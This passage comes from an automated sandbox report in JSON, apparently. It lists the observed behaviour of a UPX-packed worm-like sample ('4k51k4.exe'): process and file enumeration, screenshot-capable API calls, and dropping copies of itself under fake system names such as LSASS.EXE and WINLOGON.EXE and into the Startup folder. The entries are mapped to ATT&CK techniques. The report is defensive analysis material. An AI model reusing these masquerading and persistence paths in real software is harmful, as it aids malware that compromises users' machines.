"attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"IsWow64Process\" with parameter \"5192\" - (UID: 00000000-00005192)\n \"4k51k4.exe\" called \"IsWow64Process\" with parameter \"5636\" - (UID: 00000000-00005636)\n \"IExplorer.exe\" called \"IsWow64Process\" with parameter \"5272\" - (UID: 00000000-00005272)\n \"WINLOGON.EXE\" called \"IsWow64Process\" with parameter \"2108\" - (UID: 00000000-00002108)\n \"CSRSS.EXE\" called \"IsWow64Process\" with parameter \"3136\" - (UID: 00000000-00003136)\n \"SERVICES.EXE\" called \"IsWow64Process\" with parameter \"5756\" - (UID: 00000000-00005756)\n \"LSASS.EXE\" called \"IsWow64Process\" with parameter \"944\" - (UID: 00000000-00000944)\n \"SMSS.EXE\" called \"IsWow64Process\" with parameter \"656\" - (UID: 00000000-00000656)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1057033083\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1057033083\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1057033083\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1057033083\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1057033083\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1057033083\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1057033083\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1057033083\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1057033083\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1057033083\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1057033083\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1057033083\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"956369335\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"956369335\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"956369335\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"956369335\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"956369335\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"956369335\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"956369335\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"956369335\"\n \"cx\": \"32\"\n \"cy\": \"32\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindFirstFileA\" with parameter C:\\\\msvbvm60.dll (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\*.* (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindNextFileW\" with parameter 4k51k4.exe (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindNextFileW\" with parameter addins (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindNextFileW\" with parameter AppCompat (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindNextFileW\" with parameter AppPatch (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindNextFileW\" with parameter assembly (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindNextFileW\" with parameter bfsvc.exe (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindNextFileW\" with parameter Boot (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindNextFileW\" with parameter bootstat.dat (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindNextFileW\" with parameter Branding (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindNextFileW\" with parameter CSC (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindNextFileW\" with parameter Cursors (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindNextFileW\" with parameter debug (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindNextFileW\" with parameter diagnostics (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindNextFileW\" with parameter DigitalLocker (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindNextFileW\" with parameter Downloaded Program Files (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindNextFileW\" with parameter ehome (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindNextFileW\" with parameter en-US (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindNextFileW\" with parameter explorer.exe (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindNextFileW\" with parameter Fonts (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindNextFileW\" with parameter fveupdate.exe (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindNextFileW\" with parameter Globalization (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FindNextFileW\" with parameter Help (UID: 00000000-00005192)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"4k51k4.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"IExplorer.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"WINLOGON.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"CSRSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SERVICES.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"LSASS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SMSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"4\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"264\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"356\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"396\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"404\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"460\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"496\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"512\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"520\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"620\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"700\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"792\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"840\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"880\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"908\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1136\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1280\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1320\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1504\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1612\"}\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1624\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" opened \"\\Device\\KsecDD\"\n \"4k51k4.exe\" opened \"\\Device\\KsecDD\"\n \"IExplorer.exe\" opened \"\\Device\\KsecDD\"\n \"WINLOGON.EXE\" opened \"\\Device\\KsecDD\"\n \"CSRSS.EXE\" opened \"\\Device\\KsecDD\"\n \"SERVICES.EXE\" opened \"\\Device\\KsecDD\"\n \"LSASS.EXE\" opened \"\\Device\\KsecDD\"\n \"SMSS.EXE\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"4k51k4.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"4k51k4.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201\" has an entrypoint in section \"UPX1\"\n \"services.exe\" has an entrypoint in section \"UPX1\"\n \"4k51k4.exe.bin\" has an entrypoint in section \"UPX1\"\n \"shell.exe\" has an entrypoint in section \"UPX1\"\n \"Empty.pif\" has an entrypoint in section \"UPX1\"\n \"4K51K4.EXE.67A9C38A.bin\" has an entrypoint in section \"UPX1\"\n \"CSRSS.EXE.bin\" has an entrypoint in section \"UPX1\"\n \"4K51K4.EXE.67A9DE16.bin\" has an entrypoint in section \"UPX1\"\n \"SERVICES.EXE\" has an entrypoint in section \"UPX1\"\n \"IEXPLORER.EXE.67A9DF9D.bin\" has an entrypoint in section \"UPX1\"\n \"SMSS.EXE\" has an entrypoint in section \"UPX1\"\n \"LSASS.EXE\" has an entrypoint in section \"UPX1\"\n \"MrHelloween.scr\" has an entrypoint in section \"UPX1\"\n \"IEXPLORER.EXE.67A9C38C.bin\" has an entrypoint in section \"UPX1\"\n \"WINLOGON.EXE\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\Users\\HAPUBWS\\AppData\\Local\\csrss.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000b80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46796 bytes starting with PE header signature to file \"C:\\Windows\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46796 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46922 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46789 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46798 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46778 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46735 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46775 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46891 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46807 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46803 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46964 bytes starting with PE header signature to file \"C:\\4K51K4\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46811 bytes starting with PE header signature to file \"C:\\Data %OSUSER%.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46818 bytes starting with PE header signature to file \"C:\\Windows\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46750 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46801 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46966 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46826 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46792 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46901 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46929 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46871 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" 